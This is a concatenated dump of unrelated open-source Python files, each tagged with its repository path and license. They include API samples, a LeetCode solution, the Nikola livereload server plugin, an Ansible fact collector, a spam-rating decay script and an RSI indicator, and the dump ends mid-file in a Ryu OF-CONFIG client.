| openSUSE/vdsm | vdsm/caps.py | Python | gpl-2.0 | 8,208 |
#!/usr/bin/env python
# http://oscon.com/oscon2012/public/schedule/detail/24416
# plus_a.py (by Wesley Chun under CC-SA3.0 license)
import os
import httplib2
from apiclient import discovery
from oauth2client import file as storage, client, tools
store = storage.Storage(settings.AUTH_FILE)
credz = store.get() if os.path.exists(settings.AUTH_FILE) else None
if not credz:
flow = client.OAuth2WebServerFlow(
client_id=settings.CLIENT_ID,
client_secret=settings.CLIENT_SECRET,
scope=settings.SCOPE,
user_agent=settings.USER_AGENT,
)
credz = tools.run(flow, store)
access = credz.authorize(httplib2.Http())
service = discovery.build('plus', 'v1', http=access)
print '\n*** Get user status (authorization required)'
data = service.activities().list(userId='me', maxResults=1,
collection='public').execute()['items'][0]
print '''
User: %s
Date: %s
Post: %s''' % (
data['actor']['displayName'], data['updated'],
' '.join(data['title'].strip().split())
)
| YuxuanLing/trunk | trunk/code/study/python/core_python_appilication/ch15/plus_a.py | Python | gpl-3.0 | 1,067 |
class Solution(object):
def searchInsert(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
lo, hi = 0, len(nums) - 1
while lo <= hi:
mid = (lo + hi) // 2
if target < nums[mid]: hi = mid - 1
elif target > nums[mid]: lo = mid + 1
else: return mid
#print(lo, hi, mid)
return lo
def searchInsert2(self, nums, target):
L, R = 0, len(nums) - 1
while L < R:
M = (L + R) // 2
if nums[M] < target:
L = M + 1
else:
R = M
print(L, R, M)
return L + 1 if nums[L] < target else L
test = Solution()
print(test.searchInsert([1,3,5,6], 7))
print(test.searchInsert2([1,3,5,6], 7)) | rx2130/Leetcode | python/35 Search Insert Position.py | Python | apache-2.0 | 833 |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
FILE: sample_hello_world.py
DESCRIPTION:
This sample demonstrates the most basic operation that can be
performed - creation of a Farmer. Use this to understand how to
create the client object, how to authenticate it, and make sure
your client is set up correctly to call into your FarmBeats endpoint.
USAGE:
```python sample_hello_world.py```
Set the environment variables with your own values before running the sample:
- `AZURE_TENANT_ID`: The tenant ID of your active directory application.
- `AZURE_CLIENT_ID`: The client ID of your active directory application.
- `AZURE_CLIENT_SECRET`: The client secret of your active directory application.
- `FARMBEATS_ENDPOINT`: The FarmBeats endpoint that you want to run these samples on.
"""
from azure.identity import DefaultAzureCredential
from azure.agrifood.farming import FarmBeatsClient
from azure.agrifood.farming.models import Farmer
import os
from dotenv import load_dotenv
def sample_hello_world():
farmbeats_endpoint = os.environ['FARMBEATS_ENDPOINT']
credential = DefaultAzureCredential()
client = FarmBeatsClient(
endpoint=farmbeats_endpoint,
credential=credential
)
farmer_id = "contoso-farmer"
farmer_name = "Contoso"
farmer_description = "Contoso is hard working."
print("Creating farmer, or updating if farmer already exists...", end=" ", flush=True)
farmer = client.farmers.create_or_update(
farmer_id=farmer_id,
farmer=Farmer(
name=farmer_name,
description=farmer_description
)
)
print("Done")
print("Here are the details of the farmer:")
print(f"\tID: {farmer.id}")
print(f"\tName: {farmer.name}")
print(f"\tDescription: {farmer.description}")
print(f"\tCreated timestamp: {farmer.created_date_time}")
print(f"\tLast modified timestamp: {farmer.modified_date_time}")
if __name__ == "__main__":
load_dotenv()
sample_hello_world()
| Azure/azure-sdk-for-python | sdk/agrifood/azure-agrifood-farming/samples/sample_hello_world.py | Python | mit | 2,076 |
# -*- coding: utf-8 -*-
# Copyright © 2012-2016 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Automatic rebuilds for Nikola."""
from __future__ import print_function
import json
import mimetypes
import os
import re
import subprocess
import sys
import time
try:
from urlparse import urlparse
from urllib2 import unquote
except ImportError:
from urllib.parse import urlparse, unquote # NOQA
import webbrowser
from wsgiref.simple_server import make_server
import wsgiref.util
import pkg_resources
from blinker import signal
try:
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import WSGIServer, WebSocketWSGIRequestHandler, WebSocketWSGIHandler
from ws4py.server.wsgiutils import WebSocketWSGIApplication
from ws4py.messaging import TextMessage
except ImportError:
WebSocket = object
try:
import watchdog
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler, PatternMatchingEventHandler
except ImportError:
watchdog = None
FileSystemEventHandler = object
PatternMatchingEventHandler = object
from nikola.plugin_categories import Command
from nikola.utils import dns_sd, req_missing, get_logger, get_theme_path, STDERR_HANDLER
LRJS_PATH = os.path.join(os.path.dirname(__file__), 'livereload.js')
error_signal = signal('error')
refresh_signal = signal('refresh')
ERROR_N = '''<html>
<head>
</head>
<boody>
ERROR {}
</body>
</html>
'''
class CommandAuto(Command):
"""Automatic rebuilds for Nikola."""
name = "auto"
logger = None
has_server = True
doc_purpose = "builds and serves a site; automatically detects site changes, rebuilds, and optionally refreshes a browser"
dns_sd = None
cmd_options = [
{
'name': 'port',
'short': 'p',
'long': 'port',
'default': 8000,
'type': int,
'help': 'Port nummber (default: 8000)',
},
{
'name': 'address',
'short': 'a',
'long': 'address',
'type': str,
'default': '127.0.0.1',
'help': 'Address to bind (default: 127.0.0.1 -- localhost)',
},
{
'name': 'browser',
'short': 'b',
'long': 'browser',
'type': bool,
'help': 'Start a web browser',
'default': False,
},
{
'name': 'ipv6',
'short': '6',
'long': 'ipv6',
'default': False,
'type': bool,
'help': 'Use IPv6',
},
{
'name': 'no-server',
'long': 'no-server',
'default': False,
'type': bool,
'help': 'Disable the server, automate rebuilds only'
},
]
def _execute(self, options, args):
"""Start the watcher."""
self.logger = get_logger('auto', STDERR_HANDLER)
LRSocket.logger = self.logger
if WebSocket is object and watchdog is None:
req_missing(['ws4py', 'watchdog'], 'use the "auto" command')
elif WebSocket is object:
req_missing(['ws4py'], 'use the "auto" command')
elif watchdog is None:
req_missing(['watchdog'], 'use the "auto" command')
self.cmd_arguments = ['nikola', 'build']
if self.site.configuration_filename != 'conf.py':
self.cmd_arguments.append('--conf=' + self.site.configuration_filename)
# Run an initial build so we are up-to-date
subprocess.call(self.cmd_arguments)
port = options and options.get('port')
self.snippet = '''<script>document.write('<script src="http://'
+ (location.host || 'localhost').split(':')[0]
+ ':{0}/livereload.js?snipver=1"></'
+ 'script>')</script>
</head>'''.format(port)
# Do not duplicate entries -- otherwise, multiple rebuilds are triggered
watched = set([
'templates/'
] + [get_theme_path(name) for name in self.site.THEMES])
for item in self.site.config['post_pages']:
watched.add(os.path.dirname(item[0]))
for item in self.site.config['FILES_FOLDERS']:
watched.add(item)
for item in self.site.config['GALLERY_FOLDERS']:
watched.add(item)
for item in self.site.config['LISTINGS_FOLDERS']:
watched.add(item)
for item in self.site._plugin_places:
watched.add(item)
# Nikola itself (useful for developers)
watched.add(pkg_resources.resource_filename('nikola', ''))
out_folder = self.site.config['OUTPUT_FOLDER']
if options and options.get('browser'):
browser = True
else:
browser = False
if options['ipv6']:
dhost = '::'
else:
dhost = None
host = options['address'].strip('[').strip(']') or dhost
# Server can be disabled (Issue #1883)
self.has_server = not options['no-server']
# Instantiate global observer
observer = Observer()
if self.has_server:
# Watch output folders and trigger reloads
observer.schedule(OurWatchHandler(self.do_refresh), out_folder, recursive=True)
# Watch input folders and trigger rebuilds
for p in watched:
if os.path.exists(p):
observer.schedule(OurWatchHandler(self.do_rebuild), p, recursive=True)
# Watch config file (a bit of a hack, but we need a directory)
_conf_fn = os.path.abspath(self.site.configuration_filename or 'conf.py')
_conf_dn = os.path.dirname(_conf_fn)
observer.schedule(ConfigWatchHandler(_conf_fn, self.do_rebuild), _conf_dn, recursive=False)
try:
self.logger.info("Watching files for changes...")
observer.start()
except KeyboardInterrupt:
pass
parent = self
class Mixed(WebSocketWSGIApplication):
"""A class that supports WS and HTTP protocols on the same port."""
def __call__(self, environ, start_response):
if environ.get('HTTP_UPGRADE') is None:
return parent.serve_static(environ, start_response)
return super(Mixed, self).__call__(environ, start_response)
if self.has_server:
ws = make_server(
host, port, server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=Mixed(handler_cls=LRSocket)
)
ws.initialize_websockets_manager()
self.logger.info("Serving HTTP on {0} port {1}...".format(host, port))
if browser:
if options['ipv6'] or '::' in host:
server_url = "http://[{0}]:{1}/".format(host, port)
else:
server_url = "http://{0}:{1}/".format(host, port)
self.logger.info("Opening {0} in the default web browser...".format(server_url))
# Yes, this is racy
webbrowser.open('http://{0}:{1}'.format(host, port))
try:
self.dns_sd = dns_sd(port, (options['ipv6'] or '::' in host))
ws.serve_forever()
except KeyboardInterrupt:
self.logger.info("Server is shutting down.")
if self.dns_sd:
self.dns_sd.Reset()
# This is a hack, but something is locking up in a futex
# and exit() doesn't work.
os.kill(os.getpid(), 15)
else:
# Workaround: can’t have nothing running (instant exit)
# but also can’t join threads (no way to exit)
# The joys of threading.
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self.logger.info("Shutting down.")
# This is a hack, but something is locking up in a futex
# and exit() doesn't work.
os.kill(os.getpid(), 15)
def do_rebuild(self, event):
"""Rebuild the site."""
# Move events have a dest_path, some editors like gedit use a
# move on larger save operations for write protection
event_path = event.dest_path if hasattr(event, 'dest_path') else event.src_path
fname = os.path.basename(event_path)
if (fname.endswith('~') or
fname.startswith('.') or
'__pycache__' in event_path or
event_path.endswith(('.pyc', '.pyo', '.pyd')) or
os.path.isdir(event_path)): # Skip on folders, these are usually duplicates
return
self.logger.info('REBUILDING SITE (from {0})'.format(event_path))
p = subprocess.Popen(self.cmd_arguments, stderr=subprocess.PIPE)
error = p.stderr.read()
errord = error.decode('utf-8')
if p.wait() != 0:
self.logger.error(errord)
error_signal.send(error=errord)
else:
print(errord)
def do_refresh(self, event):
"""Refresh the page."""
# Move events have a dest_path, some editors like gedit use a
# move on larger save operations for write protection
event_path = event.dest_path if hasattr(event, 'dest_path') else event.src_path
self.logger.info('REFRESHING: {0}'.format(event_path))
p = os.path.relpath(event_path, os.path.abspath(self.site.config['OUTPUT_FOLDER']))
refresh_signal.send(path=p)
def serve_static(self, environ, start_response):
"""Trivial static file server."""
uri = wsgiref.util.request_uri(environ)
p_uri = urlparse(uri)
f_path = os.path.join(self.site.config['OUTPUT_FOLDER'], *[unquote(x) for x in p_uri.path.split('/')])
# ‘Pretty’ URIs and root are assumed to be HTML
mimetype = 'text/html' if uri.endswith('/') else mimetypes.guess_type(uri)[0] or 'application/octet-stream'
if os.path.isdir(f_path):
if not p_uri.path.endswith('/'): # Redirect to avoid breakage
start_response('301 Moved Permanently', [('Location', p_uri.path + '/')])
return []
f_path = os.path.join(f_path, self.site.config['INDEX_FILE'])
mimetype = 'text/html'
if p_uri.path == '/robots.txt':
start_response('200 OK', [('Content-type', 'text/plain; charset=UTF-8')])
return ['User-Agent: *\nDisallow: /\n'.encode('utf-8')]
elif os.path.isfile(f_path):
with open(f_path, 'rb') as fd:
if mimetype.startswith('text/') or mimetype.endswith('+xml'):
start_response('200 OK', [('Content-type', "{0}; charset=UTF-8".format(mimetype))])
else:
start_response('200 OK', [('Content-type', mimetype)])
return [self.file_filter(mimetype, fd.read())]
elif p_uri.path == '/livereload.js':
with open(LRJS_PATH, 'rb') as fd:
start_response('200 OK', [('Content-type', mimetype)])
return [self.file_filter(mimetype, fd.read())]
start_response('404 ERR', [])
return [self.file_filter('text/html', ERROR_N.format(404).format(uri).encode('utf-8'))]
def file_filter(self, mimetype, data):
"""Apply necessary changes to document before serving."""
if mimetype == 'text/html':
data = data.decode('utf8')
data = self.remove_base_tag(data)
data = self.inject_js(data)
data = data.encode('utf8')
return data
def inject_js(self, data):
"""Inject livereload.js."""
data = re.sub('</head>', self.snippet, data, 1, re.IGNORECASE)
return data
def remove_base_tag(self, data):
"""Comment out any <base> to allow local resolution of relative URLs."""
data = re.sub(r'<base\s([^>]*)>', '<!--base \g<1>-->', data, re.IGNORECASE)
return data
pending = []
class LRSocket(WebSocket):
"""Speak Livereload protocol."""
def __init__(self, *a, **kw):
"""Initialize protocol handler."""
refresh_signal.connect(self.notify)
error_signal.connect(self.send_error)
super(LRSocket, self).__init__(*a, **kw)
def received_message(self, message):
"""Handle received message."""
message = json.loads(message.data.decode('utf8'))
self.logger.info('<--- {0}'.format(message))
response = None
if message['command'] == 'hello': # Handshake
response = {
'command': 'hello',
'protocols': [
'http://livereload.com/protocols/official-7',
],
'serverName': 'nikola-livereload',
}
elif message['command'] == 'info': # Someone connected
self.logger.info('****** Browser connected: {0}'.format(message.get('url')))
self.logger.info('****** sending {0} pending messages'.format(len(pending)))
while pending:
msg = pending.pop()
self.logger.info('---> {0}'.format(msg.data))
self.send(msg, msg.is_binary)
else:
response = {
'command': 'alert',
'message': 'HEY',
}
if response is not None:
response = json.dumps(response)
self.logger.info('---> {0}'.format(response))
response = TextMessage(response)
self.send(response, response.is_binary)
def notify(self, sender, path):
"""Send reload requests to the client."""
p = os.path.join('/', path)
message = {
'command': 'reload',
'liveCSS': True,
'path': p,
}
response = json.dumps(message)
self.logger.info('---> {0}'.format(p))
response = TextMessage(response)
if self.stream is None: # No client connected or whatever
pending.append(response)
else:
self.send(response, response.is_binary)
def send_error(self, sender, error=None):
"""Send reload requests to the client."""
if self.stream is None: # No client connected or whatever
return
message = {
'command': 'alert',
'message': error,
}
response = json.dumps(message)
response = TextMessage(response)
if self.stream is None: # No client connected or whatever
pending.append(response)
else:
self.send(response, response.is_binary)
class OurWatchHandler(FileSystemEventHandler):
"""A Nikola-specific handler for Watchdog."""
def __init__(self, function):
"""Initialize the handler."""
self.function = function
super(OurWatchHandler, self).__init__()
def on_any_event(self, event):
"""Call the provided function on any event."""
self.function(event)
class ConfigWatchHandler(FileSystemEventHandler):
"""A Nikola-specific handler for Watchdog that handles the config file (as a workaround)."""
def __init__(self, configuration_filename, function):
"""Initialize the handler."""
self.configuration_filename = configuration_filename
self.function = function
def on_any_event(self, event):
"""Call the provided function on any event."""
if event._src_path == self.configuration_filename:
self.function(event)
try:
# Monkeypatch to hide Broken Pipe Errors
f = WebSocketWSGIHandler.finish_response
if sys.version_info[0] == 3:
EX = BrokenPipeError # NOQA
else:
EX = IOError
def finish_response(self):
"""Monkeypatched finish_response that ignores broken pipes."""
try:
f(self)
except EX: # Client closed the connection, not a real error
pass
WebSocketWSGIHandler.finish_response = finish_response
except NameError:
# In case there is no WebSocketWSGIHandler because of a failed import.
pass
| wcmckee/nikola | nikola/plugins/command/auto/__init__.py | Python | mit | 17,275 |
from tkinter import *
from tkinter.filedialog import *
from tkinter.messagebox import *
from .binary import *
from .linear import *
"""
This file contains the searches GUI
"""
class SearchesGui(Tk):
"""
Searches GUI for Libuseful
"""
def __init__(self, *args, **kwargs):
"""
Create the GUI elements.
"""
Tk.__init__(self, *args, **kwargs)
self.title("Searches")
self.left_frame = Frame(self)
self.left_frame.pack(side=LEFT)
self.right_frame = Frame(self)
self.right_frame.pack(side=RIGHT)
self.items = Listbox(self.left_frame)
self.items.pack()
self.file_field = Entry(self.right_frame)
self.file_field.pack()
self.file_load_button = Button(self.right_frame, text = "Load File", command = self.loadfile)
self.file_load_button.pack()
self.file_choose_button = Button(self.right_frame, text = "Pick File", command = self.pickfile)
self.file_choose_button.pack()
self.to_search_field = Entry(self.right_frame)
self.to_search_field.pack()
self.bsearch_button = Button(self.right_frame, text = "Binary search", command = self.do_bsearch)
self.bsearch_button.pack()
self.lsearch_button = Button(self.right_frame, text = "Linear search", command = self.do_lsearch)
self.lsearch_button.pack()
self.mainloop()
def loadfile(self):
"""
Load a file into the GUI.
"""
f = open(self.file_field.get())
self.litems = [i[:-1] for i in f.readlines()]
self.litems.sort()
for i in self.litems:
self.items.insert(END, i)
f.close()
def pickfile(self):
"""
Pick a file to load into the GUI.
"""
x = askopenfilename()
if x == '':
return
self.file_field.delete(0, END)
self.file_field.insert(0, x)
def do_bsearch(self):
"""
Perform binary search.
"""
self.loadfile()
self.items.selection_clear(0, END)
x = binary_search(self.litems, self.to_search_field.get())[0]
if x is -1:
showwarning("", "That item wasn't found.")
self.items.selection_set(x)
self.items.see(x)
def do_lsearch(self):
"""
Perform linear search.
"""
self.loadfile()
self.items.selection_clear(0, END)
x = linear_search(self.litems, self.to_search_field.get())[0]
if x is -1:
showwarning("", "That item wasn't found.")
self.items.selection_set(x)
self.items.see(x)
def main():
"""
Run the GUI.
"""
SearchesGui()
if __name__ == '__main__':
main()
| jcotton42/libuseful | searches/gui.py | Python | gpl-3.0 | 2,865 |
# Fibre Channel WWN initiator related facts collection for ansible.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import glob
from ansible.module_utils.facts.utils import get_file_lines
from ansible.module_utils.facts.collector import BaseFactCollector
class FcWwnInitiatorFactCollector(BaseFactCollector):
name = 'fibre_channel_wwn'
_fact_ids = set()
def collect(self, module=None, collected_facts=None):
"""
Example contents /sys/class/fc_host/*/port_name:
0x21000014ff52a9bb
"""
fc_facts = {}
fc_facts['fibre_channel_wwn'] = []
if sys.platform.startswith('linux'):
for fcfile in glob.glob('/sys/class/fc_host/*/port_name'):
for line in get_file_lines(fcfile):
fc_facts['fibre_channel_wwn'].append(line.rstrip()[2:])
elif sys.platform.startswith('sunos'):
"""
on solaris 10 or solaris 11 should use `fcinfo hba-port`
TBD (not implemented): on solaris 9 use `prtconf -pv`
"""
cmd = module.get_bin_path('fcinfo')
cmd = cmd + " hba-port"
rc, fcinfo_out, err = module.run_command(cmd)
"""
# fcinfo hba-port | grep "Port WWN"
HBA Port WWN: 10000090fa1658de
"""
if fcinfo_out:
for line in fcinfo_out.splitlines():
if 'Port WWN' in line:
data = line.split(' ')
fc_facts['fibre_channel_wwn'].append(data[-1].rstrip())
elif sys.platform.startswith('aix'):
# get list of available fibre-channel devices (fcs)
cmd = module.get_bin_path('lsdev')
cmd = cmd + " -Cc adapter -l fcs*"
rc, lsdev_out, err = module.run_command(cmd)
if lsdev_out:
lscfg_cmd = module.get_bin_path('lscfg')
for line in lsdev_out.splitlines():
# if device is available (not in defined state), get its WWN
if 'Available' in line:
data = line.split(' ')
cmd = lscfg_cmd + " -vl %s" % data[0]
rc, lscfg_out, err = module.run_command(cmd)
# example output
# lscfg -vpl fcs3 | grep "Network Address"
# Network Address.............10000090FA551509
for line in lscfg_out.splitlines():
if 'Network Address' in line:
data = line.split('.')
fc_facts['fibre_channel_wwn'].append(data[-1].rstrip())
return fc_facts
| alxgu/ansible | lib/ansible/module_utils/facts/network/fc_wwn.py | Python | gpl-3.0 | 3,450 |
#!/usr/bin/env python
'''
This file is part of the ASNN eMail Suite.
ASNN-MDA is free software: you can redistribute it and/or modify
it under the terms of the version 2 GNU General Public License
as published by the Free Software Foundation.
ASNN-MDA is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
If you don't know about the GNU General Public License by now,
you can find information about it at http://www.gnu.org/licenses/
'''
# ASNN Reduction of Spam-Rating Process
'''
The intention of this tool is that it be run on a regular interval (like in a
'cron' job) to slightly reduce the spam-rating of each IP address or domain.
This is so the current spam-rating of each entry will slowly taper off unless
the entry is further bolstered by improper activity of the entity associated
with the entry.
Because the 'spamrating' field is an integer number, the minimum amount that
rating should be reduced is one unit per cycle. If this is not done, then
a 'spamrating' will never reach zero. If that is the intention, use the
provided option when invoking this program.
The rating may be reduced by a percentage or fixed integer amount. If reduced
by a decimal percentage, the reduction value is truncated to the next lower
integer value, but a minimum of '1' unless the 'zero' option is selected.
'''
# -----------------------------------------------------------------------------
def convert_from_int(numericalip):
addressstr = ''
for index in range(4):
addressstr = (str(numericalip & 255) + '.' + addressstr)
numericalip /= 256
return addressstr[:-1]
# -----------------------------------------------------------------------------
import os, sys, time, socket, argparse
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "asnn.settings")
import django
django.setup()
from asnn import models
from django.core.exceptions import ObjectDoesNotExist
parser = argparse.ArgumentParser()
parser.add_argument("-v", dest='debug', action="count", default = 0, \
help="debug vebosity")
parser.add_argument("-t", dest='testrun', action = "store_true", \
help="test run, don't store values")
parser.add_argument("-z", dest='zero', action = "store_true", \
help="don't enforce minimum reduction of '1'")
parser.add_argument("-i", dest='ipaddrs', action = "store_true", \
help="process against IP addresses")
parser.add_argument("-d", dest='domains', action = "store_true", \
help="process against domains")
parser.add_argument("-l", dest='logfile', type=str, \
default = './asnn_reduce_spamrating.log', \
help="log file to save to")
parser.add_argument("-L", dest='nolog', action = "store_true", \
help="don't save to log file")
parser.add_argument("-p", dest='perreduct', type=str, \
default = None, help="percentage reduction of value")
parser.add_argument("-c", dest='linreduct', type=str, \
default = None, help="linear reduction of value")
args = parser.parse_args()
debug = args.debug
if debug > 0:
print >> sys.stderr, "Debug level set to", debug
if args.testrun:
print >> sys.stderr, "Test run, nothing to be saved"
if not args.ipaddrs and not args.domains:
print >> sys.stderr, "you need to specify whether to process against IPs or Domains"
sys.exit(1)
if not args.perreduct and not args.linreduct:
print >> sys.stderr, "you need to specify the reduction amount"
sys.exit(1)
if args.perreduct and args.linreduct:
print >> sys.stderr, "linear and percentage reduction cannot be used together"
sys.exit(1)
if args.perreduct:
try:
perreduct = float(args.perreduct) / 100.0
except:
print >> sys.stderr, "percentage reduction value is bad"
sys.exit(1)
else:
linreduct = None
if args.linreduct:
try:
linreduct = int(args.linreduct)
except:
print >> sys.stderr, "percentage reduction value is bad"
sys.exit(1)
else:
perreduct = None
if not args.nolog:
logfile = open(args.logfile, 'a')
else:
logfile = None
# -------------------------------------------
if args.ipaddrs:
if debug > 0:
print >> sys.stderr, "Processing against IP addresses"
if logfile:
logfile.write(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime()) + \
' PID ' + str(os.getpid()) + ': IP addresses: ')
if args.testrun:
logfile.write('test run: ')
if perreduct:
logfile.write('percentage reduction of ' + str(perreduct * 100) + '%\n')
if linreduct:
logfile.write('linear reduction of ' + str(linreduct) + '\n')
for dobj in models.IPs.objects.filter(spamrating__gt = 0):
if debug > 1:
if dobj.addrlower == dobj.addrupper:
print >> sys.stderr, "address", convert_from_int(dobj.addrlower),
else:
print >> sys.stderr, "range", convert_from_int(dobj.addrlower) + '-' + \
convert_from_int(dobj.addrupper),
if perreduct:
if not args.zero:
reduction = max(int(perreduct * dobj.spamrating), 1)
else:
reduction = int(perreduct * dobj.spamrating)
else: # assumes 'linreduct' exists
reduction = linreduct
if debug > 1:
print >> sys.stderr, "reduced by", reduction
if not args.testrun:
dobj.spamrating -= reduction
dobj.save()
if logfile:
logfile.write(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime()) + \
' PID ' + str(os.getpid()) + ': completed run\n')
# -------------------------------------------
if args.domains:
if debug > 0:
print >> sys.stderr, "Processing against domains"
if logfile:
logfile.write(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime()) + \
' PID ' + str(os.getpid()) + ': Domains: ')
if args.testrun:
logfile.write('test run: ')
if perreduct:
logfile.write('percentage reduction of ' + str(perreduct * 100) + '%\n')
if linreduct:
logfile.write('linear reduction of ' + str(linreduct) + '\n')
for dobj in models.Domains.objects.filter(spamrating__gt = 0):
if debug > 1:
print >> sys.stderr, dobj.domain,
if perreduct:
if not args.zero:
reduction = max(int(perreduct * dobj.spamrating), 1)
else:
reduction = int(perreduct * dobj.spamrating)
else: # assumes 'linreduct' exists
reduction = linreduct
if debug > 1:
print >> sys.stderr, "reduced by", reduction
if not args.testrun:
dobj.spamrating -= reduction
dobj.save()
if logfile:
logfile.write(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime()) + \
' PID ' + str(os.getpid()) + ': completed run\n')
| marvinglenn/asnn-mda | asnn_reduce_spamrating.py | Python | gpl-2.0 | 7,003 |
from __future__ import print_function
import pandas as pd
def RSI(prices, period=14):
"""
Developed J. Welles Wilder, the Relative Strength Index (RSI) is a
momentum oscillator that measures the speed and change of price
movements. RSI oscillates between zero and 100. Traditionally,
and according to Wilder, RSI is considered overbought when above 70
and oversold when below 30. Signals can also be generated by looking
for divergences, failure swings and centerline crossovers. RSI can
also be used to identify the general trend.
"""
df = prices.copy()
df['diff'] = df['close'].diff().fillna(0.0)
df['gain'] = df[df['diff'] > 0]['diff']
df['gain'].fillna(0.0, inplace=True)
df['loss'] = df[df['diff'] < 0]['diff'].abs()
df['loss'].fillna(0.0, inplace=True)
df['avg_gain'] = df['gain'].ewm(span=period+1).mean()
df['avg_loss'] = df['loss'].ewm(span=period+1).mean()
df['rs'] = df['avg_gain'] / df['avg_loss']
df['rs'].fillna(0.0, inplace=True)
rsi = 100. - (100. / (1 + df['rs']))
return rsi
| nwillemse/nctrader | nctrader/indicators.py | Python | mit | 1,091 |
#!/usr/bin/env python
#
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2013 YAMAMOTO Takashi <yamamoto at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# a simple command line OF-CONFIG client
#
# a usage example:
# % PYTHONPATH=. ./bin/of_config_cli \
# --peers=sw1=localhost:1830:username:password
# (Cmd) raw_get sw1
import ryu.contrib
from ryu import cfg
import cmd
import sys
import lxml.etree as ET
from ryu.lib import of_config
from ryu.lib.of_config import capable_switch
from ncclient.operations.rpc import RPCError
import ryu.lib.of_config.classes as ofc
CONF = cfg.CONF
CONF.register_cli_opts([
cfg.ListOpt('peers', default=[], help='list of peers')
])
class Peer(capable_switch.OFCapableSwitch):
def __init__(self, name, host, port, username, password):
self._name = name
super(Peer, self).__init__(
host=host, port=port, username=username, password=password,
unknown_host_cb=lambda host, fingeprint: True)
peers = {}
def add_peer(name, host, port, username, password):
peers[name] = Peer(name, host, port, username, password)
def et_tostring_pp(tree):
# pretty_print is an lxml feature, not available in ElementTree
try:
return ET.tostring(tree, pretty_print=True)
except TypeError:
return ET.tostring(tree)
def validate(tree):
schema = ET.XMLSchema(file=of_config.OF_CONFIG_1_1_1_XSD)
if not schema(tree):
print(schema.error_log)
class Cmd(cmd.Cmd):
def __init__(self, *args, **kwargs):
self._in_onecmd = False
cmd.Cmd.__init__(self, *args, **kwargs)
def _request(self, line, f):
args = line.split()
try:
peer = args[0]
except:
print("argument error")
return
try:
p = peers[peer]
except KeyError:
print("unknown peer " + peer)
return
try:
f(p, args[1:])
except RPCError as e:
print("RPC Error " + e)
except EOFError:
print("disconnected")
def _complete_peer(self, text, line, _begidx, _endidx):
if len((line + 'x').split()) >= 3:
return []
return [name for name in peers if name.startswith(text)]
def do_list_cap(self, line):
"""list_cap <peer>
"""
def f(p, args):
for i in p.netconf.server_capabilities:
print(i)
self._request(line, f)
def do_raw_get(self, line):
"""raw_get <peer>
"""
def f(p, args):
result = p.raw_get()
tree = ET.fromstring(result)
validate(tree)
print(et_tostring_pp(tree))
self._request(line, f)
def do_raw_get_config(self, line):
"""raw_get_config <peer> <source>
"""
def f(p, args):
try:
source = args[0]
except:
print("argument error")
return
result = p.raw_get_config(source)
tree = ET.fromstring(result)
validate(tree)
print(et_tostring_pp(tree))
self._request(line, f)
def do_get(self, line):
"""get <peer>
eg. get sw1
"""
def f(p, args):
print(p.get())
self._request(line, f)
def do_commit(self, line):
"""commit <peer>
eg. commit sw1
"""
def f(p, args):
print(p.commit())
self._request(line, f)
def do_discard(self, line):
"""discard <peer>
eg. discard sw1
"""
def f(p, args):
print(p.discard_changes())
self._request(line, f)
def do_get_config(self, line):
"""get_config <peer> <source>
eg. get_config sw1 startup
"""
def f(p, args):
try:
source = args[0]
except:
print("argument error")
return
print(p.get_config(source))
self._request(line, f)
def do_delete_config(self, line):
"""delete_config <peer> <source>
eg. delete_config sw1 startup
"""
def f(p, args):
try:
source = args[0]
except:
print("argument error")
return
print(p.delete_config(source))
self._request(line, f)
def do_copy_config(self, line):
"""copy_config <peer> <source> <target>
eg. copy_config sw1 running startup
"""
def f(p, args):
try:
source, target = args
except:
print("argument error")
return
print(p.copy_config(source, target))
self._request(line, f)
def do_list_port(self, line):
"""list_port <peer>
"""
def f(p, args):
o = p.get()
for p in o.resources.port:
